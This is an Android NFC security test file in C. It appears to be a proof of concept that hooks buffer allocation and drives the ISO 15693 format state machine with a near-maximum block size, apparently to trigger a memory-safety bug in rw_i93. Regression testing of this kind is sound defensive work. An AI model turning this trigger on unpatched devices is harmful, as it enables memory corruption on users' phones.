/* * Copyright (C) 2021 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include #include #include #include #include #include "../includes/common.h" #include "../includes/memutils.h" char enable_selective_overload = ENABLE_NONE; // borrowed from rw_i93.cc #define RW_I93_FORMAT_DATA_LEN 8 extern tRW_CB rw_cb; extern tNFC_CB nfc_cb; void rw_init(void); tNFC_STATUS rw_i93_select(uint8_t* p_uid); void* vulnerable_ptr; void* GKI_getbuf(uint16_t size) { void* ptr = malloc(size); if (size == RW_I93_FORMAT_DATA_LEN) { vulnerable_ptr = ptr; } return ptr; } void GKI_freebuf(void* p_buf) { if (p_buf == vulnerable_ptr) { free(p_buf); } } int main() { enable_selective_overload = ENABLE_ALL; tRW_I93_CB* p_i93 = &rw_cb.tcb.i93; GKI_init(); rw_init(); uint8_t p_uid = 1; if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { return EXIT_FAILURE; } tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; tNFC_CONN_EVT event = NFC_DATA_CEVT; tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN)); if (!p_data) { return EXIT_FAILURE; } p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR)); if (!(p_data->data.p_data)) { free(p_data); return EXIT_FAILURE; } p_i93->state = RW_I93_STATE_FORMAT; p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY; p_i93->block_size = I93_MAX_BLOCK_LENGH - 1; p_data->status = NFC_STATUS_OK; TIMER_LIST_ENT pFirst = {}; nfc_cb.quick_timer_queue.p_first = &pFirst; p_cb->p_cback(0, event, p_data); free(p_data->data.p_data); free(p_data); enable_selective_overload = ENABLE_NONE; return EXIT_SUCCESS; }